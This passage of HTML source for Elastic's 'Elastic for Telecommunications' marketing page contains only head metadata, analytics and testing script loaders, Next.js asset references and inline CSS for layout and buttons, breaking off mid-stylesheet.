<!DOCTYPE html><html lang="en-us"><head><meta charSet="utf-8"/><title>Elastic for Telecommunications | Elastic</title><link rel="apple-touch-icon" sizes="57x57" href="/apple-icon-57x57.png"/><link rel="apple-touch-icon" sizes="60x60" href="/apple-icon-60x60.png"/><link rel="apple-touch-icon" sizes="72x72" href="/apple-icon-72x72.png"/><link rel="apple-touch-icon" sizes="76x76" href="/apple-icon-76x76.png"/><link rel="apple-touch-icon" sizes="114x114" href="/apple-icon-114x114.png"/><link rel="apple-touch-icon" sizes="120x120" href="/apple-icon-120x120.png"/><link rel="apple-touch-icon" sizes="144x144" href="/apple-icon-144x144.png"/><link rel="apple-touch-icon" sizes="152x152" href="/apple-icon-152x152.png"/><link rel="apple-touch-icon" sizes="180x180" href="/apple-icon-180x180.png"/><link rel="apple-touch-icon" sizes="192x192" href="/apple-icon-192x192.png"/><link rel="icon" type="image/png" href="/favicon-32x32.png" sizes="32x32"/><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="icon" href="/favicon.ico" type="image/x-icon"/><link rel="apple-touch-icon-precomposed" sizes="64x64" href="/favicon_64x64_16bit.png"/><link rel="apple-touch-icon-precomposed" sizes="32x32" href="/favicon_32x32.png"/><link rel="apple-touch-icon-precomposed" sizes="16x16" href="/favicon_16x16.png"/><meta name="application-name" content="Elastic"/><link rel="icon" type="image/png" href="/android-chrome-192x192.png" sizes="192x192"/><link rel="icon" type="image/png" href="/favicon-96x96.png" sizes="96x96"/><link rel="icon" type="image/png" href="/favicon-16x16.png" sizes="16x16"/><link rel="icon" type="image/png" href="/favicon-48x48.png" sizes="48x48"/><link rel="manifest" href="/manifest.json" crossorigin="use-credentials"/><meta name="msapplication-TileColor" content="#ffffff"/><meta name="localized" content="true"/><meta name="msapplication-TileImage" content="/mstile-144x144.png"/><meta name="description" content="Learn about the Search &amp; Data Platform for Telecommunications from Elastic that enables this sector to transform operations in the 5G era, gain deeper insight into key performance indicators, enhance ..."/><meta property="og:title" content="Elastic for Telecommunications"/><meta property="og:description" content="Learn about the Search &amp; Data Platform for Telecommunications from Elastic that enables this sector to transform operations in the 5G era, gain deeper insight into key performance indicators, enhance ..."/><meta property="og:image" content="https://www.elastic.co/static-res/images/social_media_default.png"/><meta name="twitter:widgets:csp" content="on"/><meta name="twitter:card" content="summary_large_image"/><meta name="twitter:site" content="@elastic"/><meta name="twitter:image" content="https://www.elastic.co/static-res/images/social_media_default.png"/><meta name="twitter:title" content="Elastic for Telecommunications"/><meta name="twitter:description" content="Learn about the Search &amp; Data Platform for Telecommunications from Elastic that enables this sector to transform operations in the 5G era, gain deeper insight into key performance indicators, enhance ..."/><script type="application/ld+json">{"@context":"http://schema.org","type":"WebPage","headline":"Telco - Achieve real-time, high- resolution insights at telco scale","url":"/industries/telecommunications"}</script><meta name="baidu-site-verification" content="ksp2qKCW7Y"/><meta name="naver-site-verification" content="936882c1853b701b3cef3721758d80535413dbfd"/><meta name="yandex-verification" content="d8a47e95d0972434"/><meta name="viewport" content="width=device-width, initial-scale=1"/><meta name="theme-color" content="#00a9e5"/><meta name="robots" content="index,follow"/><link rel="canonical" href="https://www.elastic.co/industries/telecommunications"/><meta name="optimizely-fullstack-flags"/><link rel="dns-prefetch" href="https://cdn.optimizely.com"/><link rel="dns-prefetch" href="https://www.googletagmanager.com"/><link rel="dns-prefetch" href="https://clearbit.com"/><link rel="dns-prefetch" href="https://quora.com"/><link rel="preconnect" href="https://sjrtp2.marketo.com"/><link rel="preconnect" href="https://www.google.com"/><link rel="preconnect" href="https://www.facebook.com"/><link rel="preconnect" href="https://www.google-analytics.com"/><script type="application/javascript">(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-58RLH5');</script><script type="application/javascript">(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({"gtm.start": new Date().getTime(),event:"gtm.js"});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!="dataLayer"?"&l="+l:"";j.async=true;j.src= "https://www.googletagmanager.com/gtm.js?id="+i+dl;f.parentNode.insertBefore(j,f); })(window,document,"script","dataLayer","GTM-KNJMG2M");</script><link rel="preconnect" href="https://logx.optimizely.com"/><link rel="preconnect" href="https://search.elastic.co"/><link rel="preload" as="script" href="https://cdn.optimizely.com/js/18132920325.js"/><script type="text/javascript" src="https://cdn.optimizely.com/js/18132920325.js"></script><link href="https://fonts.googleapis.com/earlyaccess/notosansjapanese.css" rel="stylesheet preload"/><link href="https://info.elastic.co/js/forms2/css/forms2-theme-plain.css" rel="stylesheet preload"/><link href="https://info.elastic.co/js/forms2/css/forms2.css" rel="stylesheet preload"/><meta name="next-head-count" content="63"/><link rel="preload" href="/_next/static/css/848376ea2064b368.css" as="style"/><link rel="stylesheet" href="/_next/static/css/848376ea2064b368.css" data-n-g=""/><link rel="preload" href="/_next/static/css/cc96b92625c11a10.css" as="style"/><link rel="stylesheet" href="/_next/static/css/cc96b92625c11a10.css" data-n-p=""/><link rel="preload" href="/_next/static/css/00b4045520c1e71f.css" as="style"/><link rel="stylesheet" href="/_next/static/css/00b4045520c1e71f.css" data-n-p=""/><link rel="preload" href="/_next/static/css/45edebee533634bf.css" as="style"/><link rel="stylesheet" href="/_next/static/css/45edebee533634bf.css" data-n-p=""/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"></script><script src="/_next/static/chunks/webpack-5148e588555dde77.js" defer=""></script><script src="/_next/static/chunks/framework-f8115f7fae64930e.js" defer=""></script><script src="/_next/static/chunks/main-e0c5d542deb1c114.js" defer=""></script><script src="/_next/static/chunks/pages/_app-083c16ca7356eced.js" defer=""></script><script src="/_next/static/chunks/94803-bededac2ac605716.js" defer=""></script><script src="/_next/static/chunks/78369-ec2165c0ca6d5d93.js" defer=""></script><script src="/_next/static/chunks/46066-934084ce72f338b5.js" defer=""></script><script src="/_next/static/chunks/12539-07e8e7ad1ecfc11a.js" defer=""></script><script src="/_next/static/chunks/63942-27b12f1e1aa13324.js" defer=""></script><script src="/_next/static/chunks/83815-e7369f199afe76a8.js" defer=""></script><script src="/_next/static/chunks/16271-72b27ce65f9bbac4.js" defer=""></script><script src="/_next/static/chunks/34827-27464bedac54c891.js" defer=""></script><script src="/_next/static/chunks/33562-651dc66677ed1457.js" defer=""></script><script src="/_next/static/chunks/98102-ccdb05f69597b878.js" defer=""></script><script src="/_next/static/chunks/66885-605d512f62ac3c81.js" defer=""></script><script src="/_next/static/chunks/77723-33e1b2a09288ac17.js" defer=""></script><script src="/_next/static/chunks/pages/default_detail-6fc749c508acaeaa.js" defer=""></script><script src="/_next/static/Vl2WrvhD4hELkCAgiQD_z/_buildManifest.js" defer=""></script><script src="/_next/static/Vl2WrvhD4hELkCAgiQD_z/_ssgManifest.js" defer=""></script><style id="__jsx-1189744782">.elastic-logo{align-items:center;display:flex;flex-shrink:0;width:100px;outline:none;}@media (min-width:767px){.elastic-logo{width:120px;}}.elastic-logo:focus-visible{outline:2px solid var(--button-primary-active-offset-color);border-radius:4px;}</style><style id="__jsx-3447688935">.icon g{fill:#000;transition:fill 0.2s ease 0s;}.icon.iconDark g{fill:#fff;}</style><style id="__jsx-1596590093">.button{text-shadow:none;box-shadow:none;}.button:hover{background:none;text-decoration:none;}.button:focus,.button:focus-visible{text-decoration:none;}.button.btn-small{height:40px;min-height:40px;}.button.btn-large{min-width:200px;min-height:60px;padding:8px 24px;}.button.icon{align-items:center;display:inline-flex;gap:8px;}.button.icon-left{flex-direction:row-reverse;}.btn-primary,.btn-secondary,.btn-secondary-inverted,input.btn-primary,a.btn-primary:not([href]):not([tabindex]){display:inline-flex;min-height:50px;height:auto;justify-content:center;align-items:center;min-width:140px;padding:8px 24px;text-align:center;text-decoration:none;box-shadow:none;border:2px solid;border-radius:4px;-webkit-transition:all 100ms ease-in;transition:all 100ms ease-in;}.btn-primary,a.btn-primary:not([href]):not([tabindex]){color:var(--button-primary-color);background-color:var(--button-primary-bg);border-color:var(--button-primary-border-color);}.btn-primary:hover,.btn-primary.hover,a.btn-primary:not([href]):not([tabindex]):hover,a.btn-primary:not([href]):not([tabindex]) .hover{color:var(--button-primary-hover-color);background-color:var(--button-primary-hover-bg);border-color:var(--button-primary-hover-border-color);}.btn-primary:focus,.btn-primary:focus-visible,a.btn-primary:not([href]):not([tabindex]):focus,a.btn-primary:not([href]):not([tabindex]):focus-visible{color:var(--button-primary-color);}.btn-primary:focus-visible,a.btn-primary:not([href]):not([tabindex]):focus-visible{color:var(--button-primary-active-color);outline:2px solid var(--button-primary-active-offset-color);outline-offset:2px;border-color:var(--button-primary-active-border-color);}.btn-secondary,a.btn-secondary:not([href]):not([tabindex]){color:var(--button-secondary-color);background-color:var(--button-secondary-bg);border-color:var(--button-secondary-border-color);}.btn-secondary:hover,.btn-secondary.hover,a.btn-secondary:not([href]):not([tabindex]):hover,a.btn-secondary:not([href]):not([tabindex]) .hover{color:var(--button-secondary-hover-color);background-color:var(--button-secondary-hover-bg);border-color:var(--button-secondary-hover-border-color);}.btn-secondary:focus,.btn-secondary:focus-visible,a.btn-secondary:not([href]):not([tabindex]):focus,a.btn-secondary:not([href]):not([tabindex]):focus-visible{color:var(--button-secondary-color);}.btn-secondary:focus-visible,a.btn-secondary:not([href]):not([tabindex]):focus-visible{color:var(--button-secondary-active-color);outline:2px solid var(--button-secondary-active-offset-color);outline-offset:2px;border-color:var(--button-secondary-active-border-color);}.btn-secondary-inverted{background:white !important;border-color:var(--button-primary-border-color);color:var(--button-primary-border-color);}.btn-secondary-inverted:hover{color:var(--button-primary-border-color) !important;}.btn-secondary-inverted:hover{color:var(--button-primary-border-color) !important;}.btn-description,.btn-tertiary,.cta-link,a.btn-tertiary:not([href]):not([tabindex]){cursor:pointer;display:inline-block;text-decoration:none;color:var(--button-tertiary-color);padding-right:27px;}.btn-description svg,.btn-tertiary svg,.cta-link svg,a.btn-tertiary:not([href]):not([tabindex]) svg{width:27px;margin-right:-27px;-webkit-transition:all 100ms ease-in;transition:all 100ms ease-in;top:50%;top:50%;left:8px;position:relative;height:inherit;}.btn-description svg path,.btn-tertiary svg path,.cta-link svg path,a.btn-tertiary:not([href]):not([tabindex]) svg path{stroke:var(--button-tertiary-color);}.btn-description:hover,.btn-tertiary:hover,.cta-link:hover,a.btn-tertiary:not([href]):not([tabindex]):hover{color:var(--button-tertiary-hover-color);}.btn-description:hover svg,.btn-tertiary:hover svg,.cta-link:hover svg,a.btn-tertiary:not([href]):not([tabindex]):hover svg{left:14px;}.btn-description:hover svg path,.btn-tertiary:hover svg path,.cta-link:hover svg path,a.btn-tertiary:not([href]):not([tabindex]):hover svg path{stroke:var(--button-tertiary-hover-color);}.btn-description:focus,.btn-description:focus-visible,.btn-tertiary:focus,.btn-tertiary:focus-visible,.cta-link:focus,.cta-link:focus-visible,a.btn-tertiary:not([href]):not([tabindex]):focus,a.btn-tertiary:not([href]):not([tabindex]):focus-visible{color:var(--button-tertiary-color);}.btn-description:focus-visible,.btn-tertiary:focus-visible,.cta-link:focus-visible,a.btn-tertiary:not([href]):not([tabindex]):focus-visible{text-decoration:none;color:var(--button-tertiary-hover-color);outline:2px solid var(--button-tertiary-active-offset-color);outline-offset:4px;border-radius:4px;padding-right:12px;}.btn-description:focus-visible svg,.btn-tertiary:focus-visible svg,.cta-link:focus-visible svg,a.btn-tertiary:not([href]):not([tabindex]):focus-visible svg{stroke:var(--button-tertiary-hover-color);}.btn-description:focus-visible svg path,.btn-tertiary:focus-visible svg path,.cta-link:focus-visible svg path,a.btn-tertiary:not([href]):not([tabindex]):focus-visible svg path{stroke:var(--button-tertiary-hover-color);}#header-alert .btn-tertiary svg path{stroke:var(--color-dark-ink);}.btn-text-link.no-underline{text-decoration:none;}.btn-text-link:hover{text-decoration:underline;}.btn-text-link.btn-small{font-size:14px;}.btn-text-link.lighter-ink{color:var(--color-lighter-ink);}@media only screen and (max-width:720px){.cta{align-items:center !important;}.btn-tertiary{margin-top:10px;}}.btn-tertiary{background:transparent !important;font-size:16px !important;font-weight:600 !important;line-height:24px !important;height:auto !important;width:auto !important;text-align:left !important;border:none !important;color:var(--button-tertiary-color);border-radius:0 !important;display:inline-block !important;vertical-align:middle !important;}.btn-tertiary .btn-copy{display:inline;line-height:24px !important;vertical-align:middle !important;}.btn-tertiary svg{display:inline-block !important;vertical-align:middle !important;margin-top:4px !important;line-height:24px !important;fill:none !important;top:auto !important;}#navigation_container .button.btn-tertiary{background:transparent !important;font-size:16px !important;font-weight:600 !important;line-height:24px !important;height:auto !important;width:auto !important;text-align:left !important;border:none !important;padding:12px 0 0 0 !important;margin:0 !important;color:#0B64DD !important;border-radius:0 !important;display:inline-block !important;vertical-align:middle !important;white-space:wrap;}#navigation_container .button.btn-tertiary .btn-copy{display:inline;line-height:24px !important;vertical-align:middle !important;}#navigation_container .button.btn-tertiary svg{display:inline-block !important;vertical-align:middle !important;margin-top:4px !important;height:24px !important;width:24px !important;line-height:24px !important;fill:none !important;}#navigation_container .button.btn-tertiary svg path{stroke:#0B64DD !important;}#navigation_container .button.btn-tertiary:hover{color:#094DAB !important;}#navigation_container .button.btn-tertiary:hover svg path{stroke:#094DAB !important;}#navigation_container .button.btn-secondary{background:transparent !important;}#navigation_container .button.btn-secondary:hover{color:white !important;}#navigation_container .button.btn-small{font-size:14px !important;font-weight:600;}@media only screen and (max-width:720px){#navigation_container .button.btn-secondary-inverted:hover{color:var(--button-primary-bg) !important;}}</style><style id="__jsx-1868079691">.render-newNav .newNav{display:block;}.render-newNav .oldNav{display:none;}.render-oldNav .newNav{display:none;}.render-oldNav .oldNav{display:block;}</style><style id="__jsx-3416596397">h1.topic-heading.jsx-3416596397,h2.topic-heading.jsx-3416596397{color:var(--topic-heading-color);}h1.topic-heading.authordesignation.jsx-3416596397,h2.topic-heading.authordesignation.jsx-3416596397{color:var(--topic-heading-color);}h1.topic-heading.teal.jsx-3416596397,h2.topic-heading.teal.jsx-3416596397{color:var(--color-light-teal);}h1.topic-heading.black.jsx-3416596397,h2.topic-heading.black.jsx-3416596397{color:var(--color-black);}</style><style id="__jsx-1955866259">.title-wrapper h1,.title-wrapper h2,.title-wrapper h3,.title-wrapper h4,.title-wrapper h5,.title-wrapper h6,.title-wrapper .h1,.title-wrapper .h2,.title-wrapper .h3,.title-wrapper .h4,.title-wrapper .h5,.title-wrapper .h6{margin:0;box-sizing:border-box;display:block;position:relative;}.title-wrapper h1 a,.title-wrapper h2 a,.title-wrapper h3 a,.title-wrapper h4 a,.title-wrapper h5 a,.title-wrapper h6 a,.title-wrapper .h1 a,.title-wrapper .h2 a,.title-wrapper .h3 a,.title-wrapper .h4 a,.title-wrapper .h5 a,.title-wrapper .h6 a{font-weight:400;text-decoration:none;font-weight:unset;}.title-wrapper h1 a:hover,.title-wrapper h2 a:hover,.title-wrapper h3 a:hover,.title-wrapper h4 a:hover,.title-wrapper h5 a:hover,.title-wrapper h6 a:hover,.title-wrapper .h1 a:hover,.title-wrapper .h2 a:hover,.title-wrapper .h3 a:hover,.title-wrapper .h4 a:hover,.title-wrapper .h5 a:hover,.title-wrapper .h6 a:hover{text-decoration:none;}.blog h2,.press-detail .press-content h2{margin-top:64px;}.blog h3,.blog h4,.blog h5,.blog h6,.press-detail .press-content h3,.press-detail .press-content h4,.press-detail .press-content h5,.press-detail .press-content h6{margin-top:32px;}</style><style id="__jsx-89852744">.vidyard-player-embed.jsx-89852744{display:none;}.overflow.jsx-89852744{width:auto;max-height:500px;}</style><style id="__jsx-388436971">.cta-group .btn-tertiary{margin-bottom:8px;}.cta-group .d-flex.flex-column a{width:100% !important;}.cta-group .icon{max-height:16px;max-height:16px;}.cta-group .is-second-cta-inline{margin-left:16px !important;}</style><style id="__jsx-1383953900">.title-text-one-column .icon-topic-heading .icon-32,.title-text-two-column .icon-topic-heading .icon-32{margin:0 16px 16px 0;max-height:32px;max-width:32px;}.title-text-one-column .title-text-desc,.title-text-two-column .title-text-desc{margin-bottom:8px;}.title-text-one-column p:last-child,.title-text-two-column p:last-child{margin-bottom:0;}.title-text-one-column .title-text-footer .inline-flex-align-items-baseline,.title-text-two-column .title-text-footer .inline-flex-align-items-baseline{display:flex;flex-direction:row;flex-wrap:wrap;align-items:baseline;}.title-text-one-column .title-text-footer .inline-flex-align-items-baseline .text-link,.title-text-two-column .title-text-footer .inline-flex-align-items-baseline .text-link{margin-left:16px;}.title-text-one-column .title-text-footer .justify-content-center a .btn-tertiary,.title-text-two-column .title-text-footer .justify-content-center a .btn-tertiary{display:flex;align-items:center;}@media screen and (max-width:767px){.icon-topic-heading.d-flex .topic-heading{padding-bottom:16px;}}</style><style id="__jsx-682499841">@media screen and (max-width:576px){card-deck-spotlight .content{text-align:center;order:2;}card-deck-spotlight .content .title{margin-top:32px;}card-deck-spotlight .content .cta-group{justify-content:center !important;}}</style><style id="__jsx-802606770">.illustration-icon-grid-container ul:not(.illustration-icon-grid-2x2) .logo{height:64px;margin-bottom:16px;}.illustration-icon-grid-item-content .arrow-down,.illustration-icon-grid-item-content .arrow-up{width:24px;margin-right:16px;}.illustration-icon-grid-item-content .statistics-title-container{display:flex;flex-direction:row;justify-content:center;}.illustration-icon-grid-item-content .statistics-title-container .arrow-down{display:flex;align-items:flex-end;}.illustration-icon-grid-item-content .statistics-title-container .arrow-down img{position:relative;bottom:20%;}.illustration-icon-grid-item-content .statistics-title-container .arrow-up{display:flex;align-items:flex-start;}.illustration-icon-grid-item-content .statistics-title-container .arrow-up img{position:relative;bottom:-25%;}.illustration-icon-grid-item-content .statistics-title-container-80px{display:flex;flex-direction:row;margin-bottom:16px;}.illustration-icon-grid-items .btn-tertiary{padding-top:16px;margin-bottom:8px;}.illustration-icon-grid-items .one-column{position:relative;display:flex;flex-direction:column;}.illustration-icon-grid-items .two-column{position:relative;display:grid;column-gap:32px;grid-template-columns:128px 1fr;}.illustration-icon-grid-items .grid-image-left .grid-image{text-align:left;}.illustration-icon-grid-items .grid-image-center .grid-image{text-align:center;}.illustration-icon-grid-items .paragraph-left .paragraph{text-align:left;}.illustration-icon-grid-items .paragraph-center .paragraph{text-align:center;}.illustration-icon-grid-items .title-heading-left .statistics-title,.illustration-icon-grid-items .title-heading-left .title-wrapper{text-align:left;}.illustration-icon-grid-items .title-heading-center .statistics-title,.illustration-icon-grid-items .title-heading-center .title-wrapper{text-align:center;}.illustration-icon-grid-items .topic-heading-left .topic-heading{text-align:left;}.illustration-icon-grid-items .topic-heading-center .topic-heading{text-align:center;}.illustration-icon-grid-items .illustration-icon-grid-item-top .icon-32{width:32px;height:32px;margin-bottom:16px;}.illustration-icon-grid-items .illustration-icon-grid-item-top .icon-64{width:64px;height:64px;margin-bottom:16px;}.illustration-icon-grid-items .illustration-icon-grid-item-top .image-xsmall{width:128px;height:128px;margin-bottom:16px;}.illustration-icon-grid-items .illustration-icon-grid-item-top .thumbnail-wrapper{overflow:hidden;position:relative;margin-bottom:32px;border-radius:10px;border:1px solid var(--color-dark-gray);}.illustration-icon-grid-items .illustration-icon-grid-item-top .thumbnail-wrapper .thumbnail{border-radius:10px;object-fit:cover;position:relative;}.illustration-icon-grid-items .illustration-icon-grid-item-top .thumbnail-wrapper .thumbnail-hover:hover img{transform:scale(1.1);transition:transform 250ms ease-in-out,-webkit-transform 250ms ease-in-out;}.illustration-icon-grid-items .illustration-icon-grid-item-top .thumbnail-default{min-height:129px;}.illustration-icon-grid-items .illustration-icon-grid-item-top .thumbnail-128{max-width:128px;width:128px;}.illustration-icon-grid-items .illustration-icon-grid-item-top .thumbnail-128 img{height:75px;}.illustration-icon-grid-items .illustration-icon-grid-item-footer{width:100%;}.illustration-icon-grid-items .illustration-icon-grid-item-footer .inline-flex-align-items-baseline{display:flex;flex-direction:row;flex-wrap:wrap;align-items:baseline;}.illustration-icon-grid-items .illustration-icon-grid-item-footer .inline-flex-align-items-baseline .text-link{margin-left:16px;}.illustration-icon-grid-2x2 .illustration-icon-grid-items .illustration-icon-grid-item-top .thumbnail-wrapper{margin:0 32px 32px 0;}.illustration-icon-grid-2x2 .illustration-icon-grid-items .illustration-icon-grid-item-top .icon-32,.illustration-icon-grid-2x2 .illustration-icon-grid-items .illustration-icon-grid-item-top .icon-64{margin-right:16px;}.illustration-icon-grid-2x2 .illustration-icon-grid-items .illustration-icon-grid-item-top .logo{height:auto;width:128px;}.illustration-icon32-clickable-list,.illustration-icon32-clickable-list-3-per-row{width:100%;}.illustration-icon32-clickable-list .illustration-icon-grid-item,.illustration-icon32-clickable-list-3-per-row .illustration-icon-grid-item{cursor:pointer;position:relative;-webkit-transform:translateY(0px);-moz-transform:translateY(0px);-ms-transform:translateY(0px);transform:translateY(0px);-moz-transition:all 0.4s;-webkit-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;}.illustration-icon32-clickable-list .illustration-icon-grid-item:after,.illustration-icon32-clickable-list-3-per-row .illustration-icon-grid-item:after{opacity:0;filter:alpha(opacity=0);-moz-transition:all 0.4s;-webkit-transition:all 0.4s;-o-transition:all 0.4s;-ms-transition:all 0.4s;transition:all 0.4s;}.illustration-icon32-clickable-list .illustration-icon-grid-item:hover:after,.illustration-icon32-clickable-list-3-per-row .illustration-icon-grid-item:hover:after{opacity:1;filter:alpha(opacity=100);}.illustration-icon32-clickable-list .illustration-icon-grid-item-top,.illustration-icon32-clickable-list-3-per-row .illustration-icon-grid-item-top{display:flex;flex-wrap:nowrap;align-items:flex-start;}.illustration-icon32-clickable-list .illustration-icon-grid-item-top .icon-32,.illustration-icon32-clickable-list .illustration-icon-grid-item-top .icon-64,.illustration-icon32-clickable-list-3-per-row .illustration-icon-grid-item-top .icon-32,.illustration-icon32-clickable-list-3-per-row .illustration-icon-grid-item-top .icon-64{margin-right:16px;}.illustration-icon32-clickable-list li,.illustration-icon32-clickable-list-3-per-row li{padding:16px;border-radius:10px;}.illustration-icon32-clickable-list li:hover,.illustration-icon32-clickable-list-3-per-row li:hover{border-right:1px none var(--color-white);border-left:1px none var(--color-white);background-color:var(--color-white);box-shadow:0 10px 20px 0 rgba(152,162,179,0.15),0 2px 6px 0 rgba(152,162,179,0.25);}.illustration-icon64-grid-5x1-container .one-column{align-items:center;}.illustration-icon64-grid-5x1-container .illustration-icon-grid-item-content h5{font-size:1.125rem;line-height:1.375rem;font-weight:700;text-align:center;}@media screen and (max-width:991px){.two-column{flex-direction:column;align-items:flex-start;}.illustration-icon-grid-container .logo{height:64px;margin-bottom:16px;}.statistics-title-container .arrow-down img{bottom:13% !important;}.statistics-title-container .arrow-up img{bottom:-18% !important;}}@media screen and (max-width:576px){.illustration-icon-grid-items{display:flex;flex-direction:column;}.illustration-icon-grid-items .two-column{display:block;}}</style><style id="__jsx-2381115616">.card-deck-container.container-border,.illustration-icon-grid-container.container-border{border:1px solid var(--carddeck-container-border-color);}.card-deck-container .card-text-image .logo,.illustration-icon-grid-container .card-text-image .logo{height:64px;max-width:128px;margin:0px 16px 16px 0px;}.card-deck-container .card-text-image .logo-width-128px,.illustration-icon-grid-container .card-text-image .logo-width-128px{max-width:128px;margin:0px 16px 16px 0px;}.card-deck-container .card-paragraph ol,.card-deck-container .paragraph ol,.illustration-icon-grid-container .card-paragraph ol,.illustration-icon-grid-container .paragraph ol{padding-left:20px !important;}.card-deck-container .card-paragraph ol li,.card-deck-container .paragraph ol li,.illustration-icon-grid-container .card-paragraph ol li,.illustration-icon-grid-container .paragraph ol li{list-style-type:decimal;}.card-deck-container .card-paragraph ol li ol,.card-deck-container .paragraph ol li ol,.illustration-icon-grid-container .card-paragraph ol li ol,.illustration-icon-grid-container .paragraph ol li ol{margin:0px;}.card-deck-container .card-paragraph ol li ol li,.card-deck-container .paragraph ol li ol li,.illustration-icon-grid-container .card-paragraph ol li ol li,.illustration-icon-grid-container .paragraph ol li ol li{list-style-type:lower-alpha;}.card-outline-2-column .card.card-outline{background:var(--color-white);display:flex;flex-direction:row;}.illustration-icon-grid-items{display:grid;grid-auto-columns:1fr;grid-template-columns:repeat(2,1fr);grid-template-rows:auto;grid-row-gap:16px;grid-column-gap:16px;margin-right:auto;margin-left:auto;}.illustration-icon-grid-items.illustration-icon-grid-4x1 .illustration-icon-grid-item,.illustration-icon-grid-items.illustration-icon32-split-grid-2x2 .illustration-icon-grid-item,.illustration-icon-grid-items .illustration-icon-grid-item-content{display:flex;flex-direction:column;position:relative;}.statistics-grid-2x1{display:grid;justify-content:stretch;grid-auto-columns:1fr;grid-column-gap:64px;grid-row-gap:64px;grid-template-columns:repeat(2,1fr);grid-template-rows:auto;width:78%;margin-left:auto;margin-right:auto;}.illustration-icon-grid-2x2{display:grid;justify-content:stretch;grid-auto-columns:1fr;grid-column-gap:64px;grid-row-gap:64px;grid-template-columns:repeat(2,1fr);grid-template-rows:auto;}.illustration-icon-grid-2x2 .two-column .illustration-icon-grid-item-content{display:flex;flex-direction:column;align-items:flex-start;justify-content:space-between;height:100%;}.illustration-icon-grid-3x1{display:grid;justify-content:stretch;grid-auto-columns:1fr;grid-column-gap:64px;grid-row-gap:64px;grid-template-columns:repeat(3,1fr);grid-template-rows:auto;}.illustration-icon-grid-4x1{display:grid;justify-content:stretch;grid-auto-columns:1fr;grid-column-gap:64px;grid-row-gap:64px;grid-template-columns:repeat(4,1fr);grid-template-rows:auto;}.illustration-icon32-clickable-list{grid-template-columns:repeat(4,1fr);}.illustration-icon32-clickable-list-3-per-row{grid-template-columns:repeat(3,1fr);}.illustration-icon32-clickable-list,.illustration-icon32-clickable-list-3-per-row{display:grid;justify-content:stretch;grid-auto-columns:1fr;grid-column-gap:32px;grid-row-gap:32px;grid-template-rows:auto;}.illustration-icon32-clickable-list .illustration-icon-grid-item,.illustration-icon32-clickable-list-3-per-row .illustration-icon-grid-item{display:flex;flex-direction:column;justify-content:space-between;align-items:stretch;position:relative;}.illustration-clickable-list-split-grid-2x2-container,.illustration-icon32-split-grid-2x2-container{display:grid;grid-template-columns:0.6fr 1fr;grid-template-rows:auto;grid-column-gap:64px;grid-row-gap:64px;align-items:start;justify-items:start !important;}.illustration-clickable-list-split-grid-2x2-container .title-text-one-column.container,.illustration-icon32-split-grid-2x2-container .title-text-one-column.container{padding:0 !important;}.illustration-clickable-list-split-grid-2x2-container .illustration-icon32-split-grid-2x2,.illustration-icon32-split-grid-2x2-container .illustration-icon32-split-grid-2x2{grid-column-gap:64px;grid-row-gap:64px;}.illustration-icon32-grid-2x2{display:grid;justify-content:stretch;grid-auto-columns:1fr;grid-column-gap:64px;grid-row-gap:64px;grid-template-columns:repeat(2,1fr);grid-template-rows:auto;}.illustration-icon32-grid-2x2-below-module-paragraph{display:grid;justify-content:stretch;grid-auto-columns:1fr;grid-column-gap:32px;grid-row-gap:32px;grid-template-columns:repeat(2,1fr);grid-template-rows:auto;}.illustration-icon32-grid-2x2-showcase{display:grid;justify-content:stretch;grid-auto-columns:1fr;grid-column-gap:64px;grid-row-gap:64px;grid-template-columns:64px repeat(2,1fr) 64px;grid-template-rows:auto;}.illustration-icon32-grid-2x2-showcase li:nth-child(odd){grid-column-start:2;}.illustration-icon32-grid-3x2{display:grid;justify-content:stretch;grid-auto-columns:1fr;grid-column-gap:64px;grid-row-gap:64px;grid-template-columns:repeat(3,1fr);grid-template-rows:auto;}.illustration-icon64-grid-3x1{display:grid;justify-content:stretch;grid-auto-columns:1fr;grid-column-gap:64px;grid-row-gap:64px;grid-template-columns:repeat(3,1fr);grid-template-rows:auto;}.illustration-icon64-grid-5x1-container{display:grid;justify-content:stretch;grid-auto-columns:1fr;grid-column-gap:32px;grid-row-gap:32px;grid-template-rows:auto;}.illustration-icon64-grid-5x1-container .one-column .illustration-icon-grid-item-content,.illustration-icon64-grid-5x1-container .one-column .illustration-icon-grid-item-top{display:flex;margin-right:auto;margin-left:auto;flex-direction:column;justify-content:flex-start;}.illustration-icon64-grid-5x1-3-per-row{grid-template-columns:repeat(3,1fr);}.illustration-icon64-grid-5x1{grid-template-columns:repeat(5,1fr);}@media screen and (max-width:991px){.illustration-icon-grid-4x1{grid-template-columns:repeat(3,1fr);}.illustration-icon-grid-2x2 .two-column{display:flex;flex-direction:column;}.illustration-icon32-clickable-list,.illustration-icon32-clickable-list-3-per-row{grid-template-columns:repeat(3,1fr);}.illustration-icon32-clickable-list .illustration-icon-grid-item-top,.illustration-icon32-clickable-list-3-per-row .illustration-icon-grid-item-top{flex-direction:column;}.illustration-icon32-grid-3x2,.illustration-icon64-grid-5x1-container{grid-column-gap:32px;grid-row-gap:32px;}.illustration-icon32-grid-2x2-showcase{grid-row-gap:32px;grid-template-columns:1fr;}.illustration-icon32-grid-2x2-showcase li:nth-child(odd){grid-column-start:initial;}.illustration-icon64-grid-5x1-container{grid-template-columns:repeat(3,1fr);}}@media screen and (max-width:980px){.statistics-grid-2x1{width:100%;}}@media screen and (max-width:767px){.illustration-icon-grid-2x2,.illustration-icon-grid-3x1,.illustration-icon-grid-4x1,.illustration-clickable-list-split-grid-2x2-container .illustration-clickable-list-split-grid-2x2,.illustration-icon32-split-grid-2x2-container .illustration-icon32-split-grid-2x2,.illustration-icon32-grid-2x2,.illustration-icon32-grid-3x2,.illustration-icon64-grid-5x1-container{grid-column-gap:32px;grid-row-gap:32px;}.statistics-grid-2x1{grid-template-columns:repeat(1,1fr);}.illustration-icon-grid-2x2{grid-template-columns:1fr;grid-template-rows:repeat(4,auto);}.illustration-icon-grid-2x2 